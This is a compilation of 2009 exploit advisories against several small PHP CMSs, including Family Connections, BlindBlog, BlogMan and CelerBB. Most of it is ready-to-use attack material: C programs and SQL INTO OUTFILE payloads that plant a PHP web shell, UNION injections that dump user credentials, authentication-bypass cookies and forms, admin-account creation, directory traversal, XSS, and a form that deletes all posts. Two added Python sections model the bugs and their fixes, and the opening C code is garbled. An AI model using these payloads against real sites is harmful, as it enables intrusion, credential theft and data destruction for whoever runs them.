    printf(\nFamily Connections = 1.8.2 - Remote Shell Upload Exploit\n Author: Salvatore \drosophila\ Fresta\n\n usage: %s server path username password\n example: %s localhost /fcms/ admin 123456\n\n, bn, bn);
}

int main(int argc, char *argv[]) {
    int sd;
    char code[] = --AaB03x\r\n Content-Disposition: form-data; name=\doc\; filename=\shell.php\\r\n Content-Type: text/plain\r\n \r\n ?php echo \pre\; system($_GET['cmd']); echo \/pre\?\r\n --AaB03x\r\n Content-Disposition: form-data; name=\desc\\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name=\submitadd\\r\n \r\n Submit\r\n --AaB03x--\r\n,
         *buffer = NULL, *rec = NULL, *session = NULL;
    if(argc 5) {
        usage(argv[0]);
        return -1;
    }
    if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char {
        perror(calloc);
        return -1;
    }
    sprintf(buffer, POST %sindex.php HTTP/1.1\r\n Host: %s\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: %d\r\n\r\nuser=%spass=%ssubmit=Login, argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]);
    printf(\n
Family Connections 1.8.2 Blind SQL Injection (Correct Version)
*** Salvatore "drosophila" Fresta ***

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] Blind SQL Injection

[-] File affected: inc/util_inc.php

An SQL injection in the authentication code normally lets a guest bypass the login, and that is exactly what the following cookies do:

    Cookie name: fcms_login_id
    Cookie content: -1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
    Cookie server: localhost (change it)
    Cookie path: /

    Cookie name: fcms_login_uname
    Cookie content: admin
    Cookie server: localhost (change it)
    Cookie path: /

    Cookie name: fcms_login_pw
    Cookie content: password
    Cookie server: localhost (change it)
    Cookie path: /

The forged row is accepted because isLoggedIn() only compares the username and password columns of whatever row the query returns with the other two cookies, and the UNION supplies a row holding exactly those values. The id is interpolated without quotes, so no quote character is needed and magic_quotes_gpc does not matter.

However, the same cookie values are reused by other functions and queries, so it is not possible to browse the site with the forged identity: the CMS ends the session every time an SQL error occurs. For this reason the ability to write query results to a file (INTO OUTFILE) is the practical way around that limit.

The following is the vulnerable code:

    ...
    elseif (isset($_COOKIE['fcms_login_id'])) {
        if (isLoggedIn($_COOKIE['fcms_login_id'], $_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
            $_SESSION['login_id']    = $_COOKIE['fcms_login_id'];
            $_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
            $_SESSION['login_pw']    = $_COOKIE['fcms_login_pw'];
        }
    ...

In util_inc.php:

    function isLoggedIn ($userid, $username, $password) {
        $result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` = $userid LIMIT 1")
            or die('<h1>Login Error (util.inc.php 275)</h1>' . mysql_error());
        if (mysql_num_rows($result) > 0) {
            $r = mysql_fetch_array($result);
            if ($r['username'] !== $username) {
                return false;
            } elseif ($r['password'] !== $password) {
                return false;
            } else {
                return true;
            }
        } else {
            return false;
        }
    }

*

[+] Code

- [A] Blind SQL Injection

    /*
     Family Connection <= 1.8.2 - Remote Command Execution
     Proof of Concept - Written by Salvatore "drosophila" Fresta

     The following software will create a file (rce.php) in the specified
     path using the Blind SQL Injection bug. To exec remote commands, you
     must open the file using a browser.
    */

    #include <string.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <netdb.h>

    int socket_connect(char *server, int port) {
        int fd;
        struct sockaddr_in sock;
        struct hostent *host;

        memset(&sock, 0, sizeof(sock));
        if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
            return -1;
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        if (!(host = gethostbyname(server)))
            return -1;
        sock.sin_addr = *((struct in_addr *) host->h_addr);
        if (connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0)
            return -1;
        return fd;
    }

    int socket_send(int socket, char *buffer, size_t size) {
        if (socket < 0)
            return -1;
        return write(socket, buffer, size) < 0 ? -1 : 0;
    }

    void usage(char *bn) {
        printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n"
               "Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n"
               "usage: %s server path fs path\n"
               "example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn);
    }

    int main(int argc, char *argv[]) {
        int sd;
        /* the PHP shell as a quoted SQL string; ';' is sent as %3b because a
           bare semicolon would end the value inside the Cookie header */
        char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo \"</pre><br><br>\"%3b?>'", *buffer;

        if (argc < 4) {
            usage(argv[0]);
            return -1;
        }
        if (!(buffer = (char *) calloc(216 + strlen(argv[1]) + strlen(argv[2]) + strlen(argv[3]), sizeof(char)))) {
            perror("calloc");
            return -1;
        }
        /* the shell is column 1 of a 22-column UNION row written to <fs path>/rce.php
           with INTO OUTFILE; the '#' comments out the trailing "LIMIT 1" */
        sprintf(buffer, "GET %shome.php HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "Cookie: fcms_login_id=-1 UNION ALL SELECT %s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '%srce.php'#\r\n\r\n",
                argv[2], argv[1], code, argv[3]);
        /* the remainder (connect, send, close) is cut off in the source listing */
Family Connections 1.8.1 Multiple Remote Vulnerabilities
*** Salvatore "drosophila" Fresta ***

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com
[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 25 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allow a registered user to view the username and password of every registered user.

- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] Files affected: register.php, activate.php

This bug allows a guest to create an account with administrator privileges. The `year` POST field is placed unescaped into the registration INSERT, so it can close the first VALUES tuple and append a second, attacker-chosen row; the exploit below creates the user root with password toor.

- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php

*

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users
http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23

- [B] Create Admin User

    <html>
    <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
    </head>
    <body>
    <p>This exploit creates a user with administrator privileges using the following information:<br>
    Username: root<br>
    Password: toor<br>
    <form action="http://localhost/fcms/register.php" method="POST">
    <input type="hidden" name="username" value="blabla">
    <input type="hidden" name="password" value="blabla">
    <input type="hidden" name="email" value="bla...@blabla.blabla">
    <input type="hidden" name="fname" value="blabla">
    <input type="hidden" name="lname" value="blabla">
    <input type="hidden" name="year" value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'r...@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#">
    <input type="submit" name="submit" value="Exploit">
    </form>
    </body>
    </html>

To activate accounts (the injected condition activates every pending account):

http://www.site.com/path/activate.php?uid=1 or 1=1&code=

- [C] Blind SQL Injection

    POST /path/lostpw.php HTTP/1.1
    Host: www.site.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 193

    email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
Community CMS 0.5 Multiple SQL Injection Vulnerabilities
*** Salvatore "drosophila" Fresta ***

[+] Application: Community CMS
[+] Version: 0.5
[+] Website: http://sourceforge.net/projects/communitycms/
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] Multiple SQL Injection

[-] Files affected: view.php, calendar.php

This bug allows a guest to view the username and password of a registered user. Both injection points are numeric, so no quote character is needed and magic_quotes_gpc makes no difference.

*

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users
http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
*** Salvatore "drosophila" Fresta ***

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/
[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS
[+] Exploitation: Remote
[+] Date: 07 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

This web application presents several vulnerabilities which can be exploited to obtain reserved information. The following are examples of the vulnerabilities discovered in this application.

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] Files affected: module/forum/class_forum.php, module/forum/class_search.php

This bug allows a guest to view the username and password of a registered user.

- [B] Directory Traversal

[-] Requisites: none
[-] Files affected: module/admin/files/show_file.php, module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and directories on the web server: both scripts live under module/admin but are reachable without authentication, and neither one confines the path it receives.

- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php

*

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25; UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23

- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc

- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
nForum 1.5 Multiple SQL Injection
*** Salvatore "drosophila" Fresta ***

[+] Application: nForum
[+] Version: 1.5
[+] Website: http://sourceforge.net/projects/nforum/
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 06 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] Files affected: showtheme.php, userinfo.php

These bugs allow a guest to view the username and the password hash of a registered user.

*

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FRO
M users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
CelerBB 0.0.2 Multiple Vulnerabilities
*** Salvatore "drosophila" Fresta ***

[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/
[+] Bugs: [A] Multiple SQL Injection
          [B] Information Disclosure
          [C] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 05 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] Files affected: viewforum.php, viewtopic.php

This bug allows a guest to view the username and password list.

- [B] Information Disclosure

[-] Requisites: none
[-] File affected: showme.php

This bug allows a guest to view reserved information of any user.

- [C] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass authentication. The form below sends no password at all: the value admin'# closes the string and comments out whatever follows in the login query.

*

[+] Code

- [A] Multiple SQL Injection

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23

- [B] Information Disclosure

http://www.site.com/path/showme.php?user=admin

- [C] Authentication Bypass

    <html>
    <head>
    <title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
    </head>
    <body>
    <form action="login.php" method="POST">
    <input type="hidden" name="Username" value="admin'#">
    <input type="submit" value="Exploit">
    </form>
    </body>
    </html>

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
WARNING - CORRECT: BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)
*** Salvatore "drosophila" Fresta ***

[+] Application: BlindBlog
[+] Version: 1.3.1
[+] Website: http://sourceforge.net/projects/cbblog/
[+] Bugs: [A] SQL Injection
          [B] Authentication Bypass
          [C] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 03 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

1) Bugs
2) Code
3) Fix

*

[+] Bugs

- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: comment.php

All queries are vulnerable. This bug allows a guest to view the username and the password of a registered user.

    $id = (isset($_GET['id']) && $_GET['id'] != '') ? $_GET['id'] : getlastid();
    $SQL = "SELECT comment,author,contact,date FROM `cblog_comments` WHERE `pid` = '$id' ORDER BY `cid` DESC";
    $resulted = $db->query($SQL, $querys);
    while ($result = mysql_fetch_assoc($resulted))
        $comments[] = $result;

- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin.login.php

    $username = $_POST['username'];
    $password = md5($_POST['password']);
    include('./db_config.php');
    $db = new db_stuff;
    $db->connect();
    $result = $db->query("SELECT * FROM `cblog_users` WHERE `username` = '$username'", $querys);
    if (mysql_num_rows($result) < 1 || mysql_num_rows($result) > 1) {
        echo "Incorrect username";
        exit;
    }
    $result = mysql_fetch_assoc($result);
    if ($result['password'] !== $password) {
        echo 'Incorrect Password';
        exit;
    }

The submitted password is compared with whatever row the query returns, so a UNION that yields exactly one row with a chosen MD5 in the password column logs the attacker in.

- [C] Local File Inclusion

[-] Requisites: none
[-] File affected: admin.php

This bug allows an admin to include local files; authentication can be bypassed with the previous bug. Combined with a readable Apache log into which PHP code has been written through a crafted request, it can be used to execute remote commands.

    ...
    } else if (isset($_GET['act']) && $_SESSION['is_admin']) {
        $loc = 'admin.'.$_GET['act'].'.php';
        include('./'.$loc);
    }
    ...

*

[+] Code

- [A] SQL Injection

http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23

- [B] Authentication Bypass

    <html>
    <head>
    <title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
    </head>
    <body>
    <form action="http://www.site.com/path/admin/admin.login.php?go=1" method="POST">
    <input type="hidden" name="username" value="-1' UNION ALL SELECT 1,'admin',MD5('expl')#">
    <input type="hidden" name="password" value="expl">
    <input type="submit" value="Exploit">
    </form>
    </body>
    </html>

- [C] Local File Inclusion

Tested on Mac OS X: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php

http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00

The %00 is what drops the '.php' suffix the script appends: on PHP versions before 5.3.4 a NUL byte ends the path string. Without it the include would look for /etc/passwd.php.

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
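The following is an added example, not code from BlindBlog, phpCommunity or the advisories, that models the two path bugs above: BlindBlog's include('./admin.' . $_GET['act'] . '.php'), where the %00 truncation is what makes the traversal reach /etc/passwd, and the free-form ?file= / ?path= parameters of phpCommunity's show_file.php and show_source.php. It then shows the checks both scripts lack: an allow-list of action names and a containment test on the normalised path. The install path and the set of admin pages are assumptions of the example.

```python
import posixpath
import re

# Assumed install path (the advisory's test was under an XAMPP docroot on
# OS X) and an assumed set of admin.<act>.php pages; neither is the project's.
BASE = "/var/www/htdocs/cbblog/admin"
ACTIONS = {"login", "posts", "comments"}


def vulnerable_include_path(act):
    """What admin.php's include('./admin.' . $_GET['act'] . '.php') resolves to.
    PHP normalises '..' lexically before touching the filesystem, as
    posixpath.normpath does, and on PHP < 5.3.4 a NUL byte in the path ends
    the C string, which is what the advisory's %00 relies on."""
    raw = "./admin." + act + ".php"
    truncated = raw.split("\0", 1)[0]
    return posixpath.normpath(posixpath.join(BASE, truncated))


def safe_include_path(act):
    """Allow-list the action, then prove the resolved path is still inside BASE."""
    if not re.fullmatch(r"[a-z]{1,32}", act) or act not in ACTIONS:
        return None
    candidate = posixpath.normpath(posixpath.join(BASE, "admin." + act + ".php"))
    # commonpath, not startswith: "/x/admin-evil" must not pass for "/x/admin"
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    return candidate


def safe_file_path(user_path, root=BASE):
    """Containment check for a free-form file parameter such as show_file.php's
    ?file= or show_source.php's ?path=: relative only, no NUL, and the
    normalised result must stay under root."""
    if "\0" in user_path or user_path.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate
```

vulnerable_include_path() returns /etc/passwd for the advisory's act value only when the NUL byte is present; without it the result is /etc/passwd.php, which is why the corrected advisory adds %00. The two safe_ functions reject both traversal strings and the absolute /etc path while still resolving legitimate names.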
BlogMan 0.45 Multiple Vulnerabilities
*** Salvatore "drosophila" Fresta ***

Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
     * Authentication Bypass
     * Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com

*

- BUGS

This blog is entirely vulnerable to SQL injection. The following are vulnerable queries that can be used to obtain reserved information.

#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
Files affected: index.php, register.php, viewall.php

The following lines are improperly checked:

    /*
    if (isset($_COOKIE['blogmanuserid'])) {
        $id = $_COOKIE['blogmanuserid'];
        $query = "SELECT * FROM user WHERE UserID='".$id."'";
        $user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
        echo "<p class='loginusername'><a href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
    */

Using a cookie editor it is possible to edit that cookie and control the query, as follows:

    Name: blogmanuserid
    Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user#
    Server: target_server (example: localhost)
    Path: /blogman/

#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php

This bug allows a guest to view the username and password of a registered user.

http://site/path/read.php?id=-1' UNION ALL SELECT NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23

#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php

This bug allows a guest to view the username and password of a registered user.

http://site/path/profile.php?id=-1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user%23

#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php

The following lines are improperly checked:

    /*
    $un = $_POST['un'];
    $pw = $_POST['pw'];
    ...
    $pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
    $userRow  = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserName='".$un."'"));
    if ($userRow['UserPassword'] == $pwHashed[0] && $userRow['UserActive'] && !$userRow['UserDisabled']) {
        $expires = time() + 3*24*60*60;
        setcookie("blogmanuserid", $userRow['UserID'], $expires);
    }
    */

Using the SQL injection it is possible to satisfy all three conditions with a forged row and to set an arbitrary UserID value. The following values must be sent by POST to doLogin.php:

    un = ' UNION ALL SELECT 1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
    pw = mypass

The first value is UserID, the third value is the password, the tenth value is UserDisabled and the eleventh value is UserActive.

#[2] Authentication Bypass:
Requisites: none
File affected: all

It is possible to bypass the authentication system by creating a cookie named 'blogmanuserid' and putting the id of a registered user in its content (often 1 for the admin): the cookie is the only session credential, and nothing signs or verifies it.

    Name: blogmanuserid
    Content: 1
    Server: target_server (example: localhost)
    Path: /blogman/

Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php

It is possible to escalate privileges using an SQL injection through the same cookie. The following lines are improperly checked:

    /*
    $id = $_COOKIE['blogmanuserid'];
    $user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserID='".$id."'"));
    if (!$user['UserCanAdmin']) {
        echo "<meta http-equiv='refresh' content='0;index.php'></head></html>";
    } else {
        ...
    }
    */

    Name: blogmanuserid
    Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
    Server: target_server
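Family Connections' isLoggedIn() (the 1.8.2 advisory above), BlindBlog's admin.login.php and BlogMan's doLogin.php all fail the same way: the code compares a password against whatever row the query returns, and a UNION lets the attacker supply that row. The following is an added example, not code from any of these projects, that reproduces the two shapes of the bug with SQLite standing in for MySQL: the Family Connections cookie (numeric context, no quotes) and the BlindBlog login (string context). It also shows what quote escaping (magic_quotes_gpc / addslashes) does and does not stop, and the parameterised form that stops both. Table layouts are constructed to match the payloads; MD5() is registered because SQLite lacks it; the MySQL '#' comment is written as '-- '; the CHAR()-based cookie variant is this example's own generalisation, not from the advisories.

```python
import hashlib
import sqlite3


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


# Constructed in-memory stand-ins for the MySQL tables. fcms_users gets 22
# columns with `username` and `password` in positions 10 and 11, the layout the
# Family Connections cookie payload assumes; cblog_users follows BlindBlog.
FCMS_COLS = (["id INTEGER"] + [f"c{i}" for i in range(2, 10)]
             + ["username", "password"] + [f"c{i}" for i in range(12, 23)])


def make_db():
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.create_function("MD5", 1, lambda s: md5(str(s)))  # SQLite lacks MD5()
    db.execute(f"CREATE TABLE fcms_users ({', '.join(FCMS_COLS)})")
    row = [1] + list(range(2, 10)) + ["realadmin", md5("s3cret")] + list(range(12, 23))
    db.execute(f"INSERT INTO fcms_users VALUES ({','.join('?' * 22)})", row)
    db.execute("CREATE TABLE cblog_users (id INTEGER, username, password)")
    db.execute("INSERT INTO cblog_users VALUES (1, 'admin', ?)", (md5("hunter2"),))
    return db


def escape_quotes(s):
    # What magic_quotes_gpc / addslashes() achieves for a quote character,
    # written in SQLite's convention ('' rather than \'): only quotes are
    # altered, so a payload that contains none passes through untouched.
    return s.replace("'", "''")


# Family Connections isLoggedIn(): $userid is interpolated without quotes.
def fcms_is_logged_in(db, userid, username, password, magic_quotes=False):
    if magic_quotes:
        userid = escape_quotes(userid)
    try:
        row = db.execute(f"SELECT * FROM fcms_users WHERE id = {userid} LIMIT 1").fetchone()
    except sqlite3.Error:          # the original dies on a SQL error: no login
        return False
    return row is not None and row["username"] == username and row["password"] == password


def fcms_is_logged_in_safe(db, userid, username, password):
    row = db.execute("SELECT * FROM fcms_users WHERE id = ? LIMIT 1", (userid,)).fetchone()
    return row is not None and row["username"] == username and row["password"] == password


# BlindBlog admin.login.php: $username sits inside single quotes.
def cblog_login(db, username, password, magic_quotes=False):
    if magic_quotes:
        username = escape_quotes(username)
    try:
        rows = db.execute(f"SELECT * FROM cblog_users WHERE username = '{username}'").fetchall()
    except sqlite3.Error:
        return False
    return len(rows) == 1 and rows[0]["password"] == md5(password)


def cblog_login_safe(db, username, password):
    rows = db.execute("SELECT * FROM cblog_users WHERE username = ?", (username,)).fetchall()
    return len(rows) == 1 and rows[0]["password"] == md5(password)


# Payloads. FCMS_COOKIE and CBLOG_USER are the advisories' own (MySQL's '#'
# comment rewritten as '-- ' for SQLite); FCMS_COOKIE_NOQUOTES spells the two
# strings with CHAR() so that quote escaping has nothing to act on.
FCMS_COOKIE = ("-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,'admin','password',"
               "12,13,14,15,16,17,18,19,20,21,22")
FCMS_COOKIE_NOQUOTES = ("-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,"
                        "CHAR(97,100,109,105,110),CHAR(112,97,115,115),"
                        "12,13,14,15,16,17,18,19,20,21,22")
CBLOG_USER = "-1' UNION ALL SELECT 1,'admin',MD5('expl')-- "


def demo():
    db = make_db()
    return {
        "fcms_forged": fcms_is_logged_in(db, FCMS_COOKIE, "admin", "password"),
        "fcms_forged_mq": fcms_is_logged_in(db, FCMS_COOKIE, "admin", "password", True),
        "fcms_noquotes_mq": fcms_is_logged_in(db, FCMS_COOKIE_NOQUOTES, "admin", "pass", True),
        "fcms_forged_safe": fcms_is_logged_in_safe(db, FCMS_COOKIE, "admin", "password"),
        "fcms_real_safe": fcms_is_logged_in_safe(db, "1", "realadmin", md5("s3cret")),
        "cblog_forged": cblog_login(db, CBLOG_USER, "expl"),
        "cblog_forged_mq": cblog_login(db, CBLOG_USER, "expl", True),
        "cblog_forged_safe": cblog_login_safe(db, CBLOG_USER, "expl"),
        "cblog_real_safe": cblog_login_safe(db, "admin", "hunter2"),
    }
```

demo() shows the asymmetry the advisories' "Requisites" lines hint at: quote escaping breaks the quoted payloads (the Family Connections cookie as published, and the BlindBlog username), but in the unquoted numeric context an attacker simply rewrites the strings with CHAR() and logs in anyway. Only the parameterised queries reject every forged value while still accepting the real credentials.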
EZ-Blog Beta 1 Multiple SQL Injection
*** Salvatore "drosophila" Fresta ***

Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com

*

- BUGS

SQL Injection:
Requisites: magic_quotes_gpc = off

This application requires no authentication for posting, deleting and so on, and it is entirely vulnerable to SQL injection, as follows:

http://site/path/public/view.php?storyid=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10%23

The database holds no highly sensitive information, but it is possible to cause damage. The following injection deletes all posts:

    <form action="http://site/path/admin/remove.php" method="POST">
    <input type="hidden" name="kill" value="1'or'1'='1">
    <input type="hidden" name="confirm" value="1">
    <input type="hidden" name="rm" value="true">
    <input type="submit" value="Exploit">
    </form>

*

-- Salvatore "drosophila" Fresta
RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability
*** Salvatore "drosophila" Fresta ***

[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/
[+] Bugs: [A] SQL Injection
          [B] XSS Persistent
[+] Exploitation: Remote
[+] Date: 02 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophila...@gmail.com

*

[+] Menu

- [1] Bugs
- [2] Code
- [3] Fix

*

[+] Bugs

- [A] SQL Injection

